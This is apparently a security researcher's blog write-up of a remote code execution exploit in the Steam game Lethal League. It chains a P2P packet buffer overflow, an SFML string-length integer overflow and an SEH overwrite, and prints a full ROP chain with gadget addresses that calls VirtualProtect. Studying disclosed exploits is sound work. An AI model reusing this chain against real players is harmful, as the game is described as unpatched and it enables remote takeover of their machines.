.o88b.
d8P  Y8
8P
8b            o |\  _ 
Y8b  d8 /|/|  | |/ |/ 
 `Y88P'  | |_/|/|_/|_/
________________________________________________________________________________

Remote Code Execution in Lethal League                              January 2025
======================================

My first real vulnerability, and I think quite an interesting one to exploit! If
you don't already know, Lethal League is a projectile fighting game released on
Steam in 2014, and was somewhat popular following a burst of internet attention.
It's far less active than it used to be, but it still has a community of players
to this day.

Discovery
---------
My first indication that there might be a security issue came completely
accidentally. I was messing around with function call hooking and interception
with Lethal League as my poor test subject, and attempted to set my in-game name
to a different value. When I got this working, and noticed it didn't have the
same limit imposed by Steam of 32 characters, I of course promptly set a name
big enough to cover the screen in text and joined a friend's lobby.

But something unexpected happened. He messaged me and said his game had crashed!
Sort of amusing in itself, but as a vulnerability researcher alarm bells were
ringing in my head. A larger input than expected crashing a program? That smells
an awful lot like a buffer overflow...

Testing Setup
-------------
Now how do we actually recreate and debug this? The bug is triggered over the
internet through a Steam lobby, so it isn't quite as simple as connecting to a
local port. We'll need two Steam accounts at the very least to join the same
Steam lobby, but I'd rather not buy the game again.

Enter Spacewar: a hidden but free game on Steam designed to show off Steam's
networking functionality for developers. Combine this with the fact that Steam
games don't actually know their own app IDs, and just trust the Steam client or
a text file to tell them, and you have both a very useful testing environment
and a favourite tactic of game pirates everywhere.

By putting a steam_appid.txt file in the game's directory containing an app ID
and running the executable directly outside of the Steam client, the game will
simply trust the ID it's given and run as whatever app the ID corresponds to.
Spacewar is a perfect app ID to run as, as it's completely free and all
networking features are fully supported. We can simply copy the game files to a
virtual machine, log in to a second Steam account and run the game as Spacewar
on both ends! Now we can fully inspect both ends of a Steam lobby connection and
start looking at this bug properly.

The Actual Bug
--------------
My first move was to just recreate the exact same large name situation that
crashed the game before. I should mention at this point that the developers
very helpfully (intentionally or not) did not strip symbols from the Linux
release of the game! The game is written in C++ and the binary contains full
class descriptions and function names, which made my job far easier.

I set up the exact same name modification as before, and ran the game through
gdb on the other end. After joining the lobby with the huge name, sure enough,
we crash:

--------------------------------------------------------------------------------
*** stack smashing detected ***: terminated

Thread 1 "LethalLeague" received signal SIGABRT, Aborted.
0xf7fc7579 in __kernel_vsyscall ()
--------------------------------------------------------------------------------

I got the following backtrace (edited for brevity):

--------------------------------------------------------------------------------
#0  0xf7fc7579 in __kernel_vsyscall ()
#1  0xf728ea27 in __pthread_kill_implementation () at pthread_kill.c:43
#2  0xf728eaaf in __pthread_kill_internal () at pthread_kill.c:78
#3  0xf723b327 in __GI_raise (sig=6) at ../sysdeps/posix/raise.c:26
#4  0xf7222121 in __GI_abort () at abort.c:79
#5  0xf72231b6 in __libc_message () at ../sysdeps/posix/libc_fatal.c:150
#6  0xf733c3b3 in __GI___fortify_fail () at fortify_fail.c:24
#7  0xf733d29f in __stack_chk_fail () at stack_chk_fail.c:24
#8  0x080de3d3 in CharacterSelectState_Netplay::poll ()
#9  0x41414141 in ?? ()
#10 0x41414141 in ?? ()
#11 0x41414141 in ?? ()
[snip]
--------------------------------------------------------------------------------

The function we were executing before the stack was trashed and the stack canary
check failed seems to be CharacterSelectState_Netplay::poll, so I had a look at
it in Ghidra. Here's a manually cleaned up decompilation:

--------------------------------------------------------------------------------
void CharacterSelectState_Netplay::poll(void *this, sf::Time *arg2)
{
    if (SteamWrapper::is_initialized(Game::getSteamWrapper(this->steam_wrap))) {
        while (true) {
            uint32 size;
            if (!SteamNetworkingWrapper::IsP2PPacketAvailable(&size, 2))
                break;

            CSteamID sender;
            char buf[512];
            if (SteamNetworkingWrapper::ReadP2PPacket(buf, size, &size,
                                                      &sender, 2)) {
                P2PData p2p;
                p2p.sender = CSteamID::ConvertToUint64(&sender);
                sf::Packet::append(&p2p.data, buf, msg_size);
                CharacterSelectState_Netplay::handle_p2p_data(this, &p2p);
            }
        }
    }
}
--------------------------------------------------------------------------------

So what's the issue here? Comparing it to the example code in the Steam API
documentation may enlighten us:

--------------------------------------------------------------------------------
uint32 msgSize = 0;
while (SteamNetworking()->IsP2PPacketAvailable(&msgSize))
{
    void *packet = malloc(msgSize);
    CSteamID steamIDRemote;
    uint32 bytesRead = 0;
    if (SteamNetworking()->ReadP2PPacket(packet, msgSize, &bytesRead,
                                                          &steamIDRemote))
    {
        // message dispatch code goes here
    }
    free(packet);
}
--------------------------------------------------------------------------------

In both cases, the size of the packet to read is retrieved from
IsP2PPacketAvailable, but crucially the official documentation uses this size to
dynamically allocate a buffer to hold the packet, and then read a packet of that
size from the other client.

The Lethal League code instead uses a fixed size 512-byte buffer while still
reading a packet of whatever size is waiting! There's nothing principally wrong
with using a fixed size buffer here as long as the size of the buffer is
reflected in the size argument to ReadP2PPacket, but that is not the case. If I
had to guess, I would imagine they copied the documentation example and later
switched to a fixed 512-byte buffer as no packet the game naturally sends
exceeds this size, but neglected to update the size of the packet being read.
After checking every instance of ReadP2PPacket in the binary I confirmed the
same vulnerable code pattern was present in every single one.

Linux Exploitation
------------------
We seem to have a classic buffer overflow on our hands! But this is the modern
day, so it's not going to be that easy. The game has stack canaries, a
non-executable stack and ASLR. It looked like I would have to either achieve
code execution by overwriting other stack variables to manipulate the game's
logic in some way and/or somehow leak the stack canary over the network.

The first idea was defeated pretty quickly by modern compilers and their
annoying security features. The compiler had strategically placed the buffer
right before the canary, so I couldn't overwrite anything interesting without
instantly corrupting the canary and aborting the program at the end of the
function.

Leaking the stack cookie seemed more plausible, so I spent a while looking at
all the different packet types the game accepted and their code paths (having
symbols made this WAY less tedious than it could have been) but I just couldn't
find anything. I was running out of ideas, so I turned to the library Lethal
League used as an abstraction for its networking and many other things: SFML.

SFML provides a simple API to access things like windows, audio, networking and
graphics in a high level and operating system independent manner, and as Lethal
League uses it for networking there was a small chance I could find a bug in the
library itself to leak some stack memory. The library is open source, which made
it easy to audit but did not fill me with hope that there would be any obvious
bugs.

The networking wrapper in question is SFML's sf::Packet class, which abstracts
serialisation and deserialisation for various data types to send and receive
over the network. Some of the data types are extremely simple to serialise, such
as integers and floats, but std::strings were a lot more interesting, especially
as I knew that Lethal League made use of them in its network protocol. As they
vary in size, SFML actually stores the length in the packet and uses that length
when deserialising. If it's part of the packet, we can control it.

This is the code for deserialising an std::string:

--------------------------------------------------------------------------------
Packet& Packet::operator>>(std::string& data)
{
    // First extract string length
    std::uint32_t length = 0;
    *this >> length;

    data.clear();
    if ((length > 0) && checkSize(length))
    {
        // Then extract characters
        data.assign(reinterpret_cast<char*>(&m_data[m_readPos]), length);

        // Update reading position
        m_readPos += length;
    }

    return *this;
}
--------------------------------------------------------------------------------

It seems they do actually validate the length in checkSize. This is the code for
checkSize:

--------------------------------------------------------------------------------
bool Packet::checkSize(std::size_t size)
{
    m_isValid = m_isValid && (m_readPos + size <= m_data.size());

    return m_isValid;
}
--------------------------------------------------------------------------------

This ensures the length cannot exceed the length of the rest of the packet. This
logic is actually sound, so is there no bug here? There is, but it's a little
subtle. While this check does generally work, in the specific case where
m_readPos is overflowed by adding size to it, it will wrap around to a smaller
value and pass the check, allowing us to smuggle in a gigantic string size that
far surpasses the buffer. When I had this thought I decided to test my theory
locally and wrote this small test program which constructs a serialised string
with a custom length and attempts to deserialise it:

--------------------------------------------------------------------------------
#include <iostream>
#include <cstdlib>
#include <cstdint>

#include <SFML/Network/Packet.hpp>

struct serial_str {
    uint32_t length;
    char data[2];
};

int main(void)
{
    serial_str str;
    str.length = 0xffffffff;
    str.data[0] = 'h';
    str.data[1] = 'i';

    sf::Packet packet;
    packet.append(&str, sizeof(str));

    std::string out;
    packet >> out;

    std::cout << out << std::endl;

    return EXIT_SUCCESS;
}
--------------------------------------------------------------------------------

m_readPos will be incremented by reading the size, and once 0xffffffff is added
to it the check should overflow and pass.

However when I tried it, I got no output. Seemingly the check had worked
properly and prevented the string from being created. After a bit more thinking
I figured out the issue - having compiled this on my 64-bit machine, size_t was
defined to be 64 bits wide, and both variables in the comparison are of type
size_t. Meanwhile, the length read from the packet was always defined as the
32-bit uint32_t. This means that the comparison is done in 64 bits and the
addition of the 32-bit size can never overflow it.

Lethal League is a 32-bit binary however, so I just added -m32 to my compiler
flags, compiling the program in 32-bit mode. This redefines size_t to be 32
bits wide and produces this output:

--------------------------------------------------------------------------------
terminate called after throwing an instance of 'std::length_error'
  what():  basic_string::_M_replace
[1]    7001 IOT instruction (core dumped)  ./test
--------------------------------------------------------------------------------

That certainly looks promising, but isn't the huge dump of stack memory I had
hoped for. After some research I found out that std::strings in C++ actually
have a maximum size, defined by std::string::max_size, and if this size is
exceeded an std::length_error exception is thrown. Another problem is that even
had the stack leak succeeded, it would read so far out of bounds that the
program would either crash or throw an access violation exception.

This might be a solvable problem if m_readPos was so large already that the size
required to overflow was small enough to not trigger either of these exceptions.
In the absence of another bug to desync m_readPos from the buffer, the only way
to do this would be to send an sf::Packet in the gigabytes. Steam certainly
won't allow this and it would be very impractical even if possible, so this
approach too seems to have reached a dead end. Keep this bug in mind for later
though!

Windows Exploitation
--------------------
Having run out of ideas, I decided to check the Windows release of the game just
in case something was different. The Windows release was stripped, but after a
bit of string cross-referencing and matching code patterns in both releases I
found the same vulnerable function as we found in the Linux version. To my
surprise, there actually was a meaningful difference - two new strange values
pushed onto the stack at the beginning of the function:

    push 0xffffffff
    push 0x54cf0b

The second value seemed to be the address of a function, which eventually ended
up jumping to __CxxFrameHandler3. Apparently this formed part of Windows'
Structured Exception Handling (SEH), and overwriting the exception handler
function pointers is a well-known Win32 exploitation technique.

The full setup looks like this:

    push 0xffffffff
    push 0x54cf0b
    mov eax, dword ptr fs:[0]
    push eax
    mov dword ptr fs:[0], esp

A similar routine is performed in reverse at the end of the function to restore
the original value of fs:[0]. What's happening here? First we need to understand
how SEH works. SEH uses a linked list of exception handlers (function pointers)
that it traverses to find an exception handler that can handle the current
exception when one is raised. A node in this linked list has this structure:

--------------------------------------------------------------------------------
struct _EXCEPTION_REGISTRATION_RECORD { 
    struct _EXCEPTION_REGISTRATION_RECORD *Next; 
    PEXCEPTION_ROUTINE Handler; 
};
--------------------------------------------------------------------------------

The first node in the list is stored in the Thread Environment Block (TEB) which
can be accessed via offsets from the fs segment register. The address of the
head of the SEH chain is the first entry in the TEB, located at fs:[0]. You can
ignore the 0xffffffff (-1) push which just helps deal with nested try/catch
statements, and focus on the effect of the instructions after it.

The new exception handler address is pushed to the stack as the Handler in the
new node, the old address of the list head is saved on the stack as the new Next
pointer, and the list head at fs:[0] is overwritten with the current stack
pointer, which points at the newly created SEH node on the stack. Now the new
node points to the old head of the list, and the head of the list points to this
new node, essentially prepending this new exception handler to the SEH chain.
This process is reversed and the old value restored at the end of the function.

The most interesting thing about this system is that the function pointers are
just placed right there on the stack. The compiler does place it behind the
stack canary, but there's still a way to exploit this. If we can overwrite the
exception handler and then trigger an exception inside the function before the
stack canary is checked, we should be able to control the instruction pointer!

After creating a more controlled exploit script that directly interacts with the
Steam SDK to connect to the lobby and send custom packets, I tried my first
payload. 512 bytes of As to fill the buffer and 4 more for the stack canary, and
we should be at the SEH structure. I overwrote the next SEH pointer with
0xffffffff to signify the end of the SEH chain (though it doesn't particularly
matter) and the actual exception handler with 0xcafebabe. Running the other end
through x64dbg I saw this in the SEH overview:

Corrupted SEH Exception Handler
(sorry to break up the lovely ASCII aesthetic)

Looks like we control the exception handler! Now we just need a way to get the
function to throw an exception before it returns. Do you remember the SFML bug
from earlier? std::string throws an exception when it's allocated with a size
that large, which is actually perfect! The game's own protocol identifies packet
types via the first byte of the packet, which then calls a handling function.
One of these is called on_player_update, which eventually reads five 1-byte
values from the packet and then an std::string, all through SFML's sf::Packet
wrapper. If we can lead the game down this code path and get it to deserialise
our string, which triggers the bug inside SFML and causes an std::length_error
to be thrown, we can get the function to call our corrupted exception handler!

I added this to my script and changed the exception handler pointer to a real
mapped address and saw this:

Invalid Exception Handler

It seems to have worked, sort of? The std::string exception was thrown, but the
program crashes complaining about an invalid exception handler. What I had
stumbled into was a security mitigation known as SafeSEH. Overwriting the SEH
chain has been a known exploitation technique for a long time (though why they
put it right there on the stack in the first place eludes me), so Microsoft
implemented SafeSEH, a security feature at compile time which hardcodes a table
of valid exception handlers which is checked at runtime to ensure any executed
exception handlers have not been corrupted, or at least not corrupted to an
address which is not a real exception handler.

Once again, I hit a roadblock. I didn't have a way to defeat this without
another bug somewhere. Just to be sure, I checked every DLL packaged with the
game in the hopes one wouldn't have SafeSEH enabled, as the SafeSEH table is
local to each DLL. If one DLL had it disabled, I could use corrupted exception
handlers in that DLL's address space unchecked.

To this end I ran PESecurity against everything in the game's directory. Here's
some of what I got:

--------------------------------------------------------------------------------
PS C:\Users\User\lethalleague> Get-PESecurity -directory .

FileName         : C:\Users\User\lethalleague\LethalLeague.exe
ARCH             : I386
DotNET           : False
ASLR             : True
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : True
ControlFlowGuard : False
HighentropyVA    : N/A

FileName         : C:\Users\User\lethalleague\libconfig++.dll
ARCH             : I386
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : True
ControlFlowGuard : False
HighentropyVA    : N/A

FileName         : C:\Users\User\lethalleague\libsndfile-1.dll
ARCH             : I386
DotNET           : False
ASLR             : False
DEP              : False
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : False
ControlFlowGuard : False
HighentropyVA    : N/A

[snip]

FileName         : C:\Users\User\lethalleague\titan_ggpo.dll
ARCH             : I386
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : True
ControlFlowGuard : False
HighentropyVA    : N/A
--------------------------------------------------------------------------------

Do you see that? For some reason libsndfile-1.dll is compiled with no
protections at all, not SafeSEH or even ASLR! Jackpot! Now I can use a false
exception handler within libsndfile-1.dll's address space, with no SafeSEH table
to contend with. Even better, I can start ROP chaining using fixed address
gadgets from libsndfile due to the lack of ASLR. First I tried just changing the
address of the SEH exception handler to point inside libsndfile-1.dll's address
space:

Corrupted EIP

It works! We have control of the instruction pointer!

Code Execution
--------------
Now we need to leverage this for full code execution. We'll have to use ROP, as
DEP (Windows' name for a non-executable stack) is in effect for the whole
process.

This article was really helpful for me in understanding how to properly exploit
ROP on Windows, I recommend giving it a read if you're trying something similar.
Much of the following process comes from that article, though with some
creativity required due to the available ROP gadgets.

Our current buffer looks like this:

                                          stack canary
                                               |
                                               v
 +-------------+----------+-------------+-------+----------+-----------+
 |player update|misc match|string length|padding| next seh |seh handler|
 |  packet id  |   data   | 0xffffffff  |       |0xffffffff|           |
 +-------------+----------+-------------+-------+----------+-----------+
0x0           0x1        0x6           0xa    0x204      0x208       0x20c

We can jump to any address within libsndfile-1.dll using the SEH handler, but
the stack isn't going to be at our buffer any more after this call. In fact it's
located quite far back up the stack. Luckily I did find a gadget to get the
stack pointing back inside our buffer, albeit toward the end of our available
space. This is the gadget I used as the SEH handler:

    add esp, 0x13c4
    pop ebx
    pop ebp
    ret

Now that we have the stack at some place in our buffer we have far more freedom
to chain gadgets for more complex effects. First though, we should move the
stack towards the front of our buffer for more space (throughout the ROP chain
you'll see a lot of 0xdeadbeef, these are throwaway bytes for arbitrary stack
values we don't really care about in gadgets, like a 'pop ebp').

--------------------------------------------------------------------------------
0x7045fe6c: ret
0x7045fe6c: ret
0x7045fe6c: ret
[...] (ropnop sled)

0x7045fcf9: mov edx, 0x800; cmovg eax, edx; pop ebp; ret
0xdeadbeef

0x7049c261: push esp; pop ebp; ret
0x7049fe6a: xchg ebp, eax; fcos; dec ecx; ret
0x7047f788: sub eax, edx; pop ebp; ret
0xdeadbeef

0x7049fe6a: xchg ebp, eax; fcos; dec ecx; ret
0x704412d2: mov esp, ebp; pop ebp; ret
--------------------------------------------------------------------------------

This, in a roundabout way, subtracts 0x800 from the stack pointer and places us
much earlier in our controlled buffer. This may look a little overcomplicated,
but remember I'm working with what I have! The only way I found to get and set
esp directly is through ebp, and the only register which could easily copy from
and write to ebp is eax. This itself only takes register operands to sub through
edx, hence the many register exchanges to achieve this simple task. The other
parts of the ROP chain are similar.

Also note the ROPNOP sled, which allows us to be imperfect with the exact stack
offset after the SEH handler. As long as we hit one of the ROPNOPs, we'll reach
our ROP chain.

Now that we have a lot more space to work with, how can we actually turn this
into arbitrary code execution? A well known way to do this on Windows using ROP
is by simply setting execute permissions for some shellcode on the stack using
the Windows API and jumping to it. This is not so simple in practice however.

How do we even call a function with the parameters we want? On top of that,
parameters which will be different every time we run the program, such as stack
addresses?

First we can look at the parameters of the function we wish to call, we'll use
VirtualProtect from the Windows API to set some of our stack memory as
executable. Here are the function arguments from the Microsoft website:

--------------------------------------------------------------------------------
BOOL VirtualProtect(
  [in]  LPVOID lpAddress,
  [in]  SIZE_T dwSize,
  [in]  DWORD  flNewProtect,
  [out] PDWORD lpflOldProtect
);
--------------------------------------------------------------------------------

This modifies the page permissions of the memory region located at lpAddress of
size dwSize to the permissions specified in flNewProtect. It also requires a
writeable address for the old permission set to avoid a crash.

This means we need a way to generate the address of our shellcode dynamically as
the exact stack addresses will change on every execution, and somehow use this
as an argument to this specific function call. Function calls in 32-bit Windows
take their arguments sequentially from the stack, so the way we generate dynamic
arguments is to set up a call site for us to use later with dummy argument
values, which we can then fill in using further gadgets. When we're finished, we
can jump to our call site with the stack set up with the arguments we want.

We have the luxury of being able to use null bytes in our payload, so we only
have two parameters which need to be dynamically calculated, along with the
return address after the function call which should return directly into our
then-executable shellcode:

--------------------------------------------------------------------------------
0x7049c261: push esp; pop ebp; ret
0x7049fe6a: xchg ebp, eax; fcos; dec ecx; ret

0x704ae472: xchg edx, eax; add esp, 0x54; pop ebx; pop ebp; ret

0xdeadbeef

0x704cb7fa: pop eax; ret
0x7066e2f8: pointer to VirtualProtect addr - 4

0x704d15dc: mov eax, dword ptr [eax + 4]; push eax; ret

0xaaaaaaaa: return address

0xbbbbbbbb: lpAddress
0x00000fff: dwSize
0x00000040: flNewProtect (0x40 = PAGE_EXECUTE_READWRITE)
0xcccccccc: writeable address
--------------------------------------------------------------------------------

libsndfile-1.dll uses VirtualProtect, so it maintains pointers to it in the
address space which I can use. This in conjunction with a gadget that loads an
address from eax (offset by 4 bytes) and instantly calls it by pushing eax and
returning straight away gives me a combination of gadgets to call
VirtualProtect. During this pseudo function call, the stack will contain the
values in the payload right after it, so we can construct a stack frame. The
first value will be the return address for VirtualProtect, which we will fill in
with the address of the shellcode. lpAddress also needs to point to the
shellcode to give it permission to execute from the stack. dwSize and
flNewProtect are already set directly as they are constant values, but the
writeable address needs to be set dynamically to some stack value.

You can see the gadgets before the call site save the current stack location in
to edx before jumping over the dummy call site. We don't want to call
VirtualProtect just yet, so we jump over it to the rest of our ROP chain, while
saving that stack location to begin overwriting the dummy placeholders with real
values using edx as a pointer.

We now need some gadgets to write values to our stack parameters. We have a
stack pointer near our parameters in edx and this helpful gadget to write
32-bit values through it:

    mov dword ptr [edx + 8], eax
    xor eax, eax
    pop ebp
    ret

We also have a gadget to advance the pointer and reach all the parameters
sequentially:

    inc edx
    add al, 0x5d
    ret

Note that both of these trash the value in eax, so we'll also keep a copy of the
old stack address in ebx, as edx will change as we move to different parameters.

With this we can begin writing our parameters. We first save the current stack
pointer into ebx for later:

--------------------------------------------------------------------------------
0x704866d0: mov eax, edx; pop edi; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7045803b: push eax; pop ebx; pop esi; pop ebp; ret
0xdeadbeef
0xdeadbeef
--------------------------------------------------------------------------------

Now we move edx to point to the first value to overwrite (the return address),
calculate the address of the shellcode (placed in our payload such that the
calculated address points somewhere inside the beginning NOP sled) and write it
to the stack through edx. Note that when restoring the value from ebx, it must
be recopied to ebx again as the gadget to read from ebx also trashes its value.

--------------------------------------------------------------------------------
0x70488804: inc edx; add al, 0x5d; ret
[repeat 15 more times]

0x704d07d5: mov eax, ebx; pop ebx; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7045803b: push eax; pop ebx; pop esi; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7048a5e8: add eax, 0x1b8; add cl, cl; ret

0x7046aca0: mov dword ptr [edx + 8], eax; xor eax, eax; pop ebp; ret
0xdeadbeef
--------------------------------------------------------------------------------

Similarly for setting lpAddress:

--------------------------------------------------------------------------------
0x70488804: inc edx; add al, 0x5d; ret
0x70488804: inc edx; add al, 0x5d; ret
0x70488804: inc edx; add al, 0x5d; ret
0x70488804: inc edx; add al, 0x5d; ret

0x704d07d5: mov eax, ebx; pop ebx; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7045803b: push eax; pop ebx; pop esi; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7048a5e8: add eax, 0x1b8; add cl, cl; ret

0x7046aca0: mov dword ptr [edx + 8], eax; xor eax, eax; pop ebp; ret
0xdeadbeef
--------------------------------------------------------------------------------

And finally the arbitrary writeable address to receive the old permissions, for
which we'll just use the address stored in ebx:

--------------------------------------------------------------------------------
0x70488804: inc edx; add al, 0x5d; ret
[repeat 11 more times]

0x704d07d5: mov eax, ebx; pop ebx; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7045803b: push eax; pop ebx; pop esi; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7046aca0: mov dword ptr [edx + 8], eax; xor eax, eax; pop ebp; ret
0xdeadbeef
--------------------------------------------------------------------------------

With the constructed stack frame now set up, we just need to jump back to our
call site, which is located 8 bytes after the current value in ebx:

--------------------------------------------------------------------------------
0x704d07d5: mov eax, ebx; pop ebx; pop ebp; ret
0xdeadbeef
0xdeadbeef

0x7047f877: add eax, 7; ret
0x70447e21: inc eax; ret

0x7049fe6a: xchg ebp, eax; fcos; dec ecx; ret
0x704412d2: mov esp, ebp; pop ebp; ret
--------------------------------------------------------------------------------

After the VirtualProtect function is entered, the stack is now set up so that
the return address points into our shellcode, and the arguments are set up for
VirtualProtect to set executable permissions on our shellcode, which it will
return into after finishing.

With this, we finally have arbitrary code execution!

You can see a video of the exploit in action from the victim's perspective here.

The victim creates a lobby in-game, then I get their lobby ID from their Steam profile and run the exploit in the background. This was done on a vanilla Windows 10 installation. The bug in SFML has since been reported and fixed. Team Reptile however have confirmed they have no intention to release a fix for the buffer overflow(s). This whole process was a lot of fun! I learnt a lot about Windows internals and exploitation, and even managed to combine a separate bug in a library for the exploit chain. It's also interesting that I couldn't find an exploit on Linux while I could on Windows, but you can reach whichever conclusions from that you wish to :)